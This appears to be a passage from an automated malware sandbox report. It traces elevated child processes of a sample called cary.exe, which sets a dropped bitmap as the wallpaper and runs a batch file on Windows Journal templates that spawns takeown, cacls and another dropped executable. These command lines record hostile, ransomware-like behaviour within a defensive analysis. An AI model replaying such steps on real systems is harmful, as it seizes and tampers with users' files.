1 | |
| Get Time | type = Ticks, time = 196609 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Hardware Information |
|
1 |
Process #14: reg.exe
12
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hdOYQpCI.bmp" /f |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:38, Reason: Child Process |
| Unmonitor | End Time: 00:01:45, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcac |
| Parent PID | 0xd98 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C98
0x
E74
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| reg.exe | 0x00960000 | 0x009b2fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000fe0000 | 0x00fe0000 | 0x04fdffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004fe0000 | 0x04fe0000 | 0x04ffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004fe0000 | 0x04fe0000 | 0x04feffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004ff0000 | 0x04ff0000 | 0x04ff3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005000000 | 0x05000000 | 0x05001fff | Private Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x05000000 | 0x05009fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000005010000 | 0x05010000 | 0x05023fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005030000 | 0x05030000 | 0x0506ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005070000 | 0x05070000 | 0x050affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000050b0000 | 0x050b0000 | 0x050b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000050c0000 | 0x050c0000 | 0x050c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000050d0000 | 0x050d0000 | 0x050d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050e0000 | 0x050e0000 | 0x0511ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005130000 | 0x05130000 | 0x0522ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005230000 | 0x05230000 | 0x0526ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052b0000 | 0x052b0000 | 0x052bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x052c0000 | 0x0537dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000053f0000 | 0x053f0000 | 0x053fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05400000 | 0x05736fff | Memory Mapped File | r |
|
|
|
- |
| kernelbase.dll.mui | 0x05740000 | 0x0581efff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x769b0000 | 0x76a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x773e0000 | 0x773e6fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ec70000 | 0x7ec70000 | 0x7ed6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed70000 | 0x7ed70000 | 0x7ed92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ed95000 | 0x7ed95000 | 0x7ed95fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed98000 | 0x7ed98000 | 0x7ed9afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed9b000 | 0x7ed9b000 | 0x7ed9bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed9d000 | 0x7ed9d000 | 0x7ed9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = Wallpaper |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = Wallpaper, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hdOYQpCI.bmp, size = 102, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x960000 |
|
1 |
Process #15: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:39, Reason: Child Process |
| Unmonitor | End Time: 00:02:56, Reason: Self Terminated |
| Monitor Duration | 00:01:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x40 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4F4
0x
CA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000de0000 | 0x00de0000 | 0x04ddffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004de0000 | 0x04de0000 | 0x04dfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004de0000 | 0x04de0000 | 0x04deffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04df3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04e01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04e03fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e10000 | 0x04e10000 | 0x04e23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e30000 | 0x04e30000 | 0x04e6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e70000 | 0x04e70000 | 0x04f6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f70000 | 0x04f70000 | 0x04f73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004f80000 | 0x04f80000 | 0x04f80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f90000 | 0x04f90000 | 0x04f91fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04fa0000 | 0x0505dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005060000 | 0x05060000 | 0x0506ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005070000 | 0x05070000 | 0x050affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050b0000 | 0x050b0000 | 0x051affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051b0000 | 0x051b0000 | 0x051bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051c0000 | 0x051c0000 | 0x052bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000054b0000 | 0x054b0000 | 0x054bffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x054c0000 | 0x057f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e470000 | 0x7e470000 | 0x7e56ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e570000 | 0x7e570000 | 0x7e592fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e598000 | 0x7e598000 | 0x7e598fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e599000 | 0x7e599000 | 0x7e59bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e59c000 | 0x7e59c000 | 0x7e59efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e59f000 | 0x7e59f000 | 0x7e59ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 195, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x474, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x73c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0x3a8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "blank.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "blank.jtp" |
|
1 |
Process #17: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:44, Reason: Child Process |
| Unmonitor | End Time: 00:02:31, Reason: Self Terminated |
| Monitor Duration | 00:00:47 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe18 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DE0
0x
E3C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000720000 | 0x00720000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x0072ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x00733fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x00741fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x00743fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000750000 | 0x00750000 | 0x00763fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x008b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x008c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008d0000 | 0x008d0000 | 0x008d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x0091ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| locale.nls | 0x04980000 | 0x04a3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004a50000 | 0x04a50000 | 0x04a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b90000 | 0x04b90000 | 0x04c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e60000 | 0x04e60000 | 0x04e6ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04e70000 | 0x051a6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f360000 | 0x7f360000 | 0x7f45ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f460000 | 0x7f460000 | 0x7f482fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f486000 | 0x7f486000 | 0x7f486fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f487000 | 0x7f487000 | 0x7f489fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f48a000 | 0x7f48a000 | 0x7f48cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f48d000 | 0x7f48d000 | 0x7f48dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 64 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 21 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
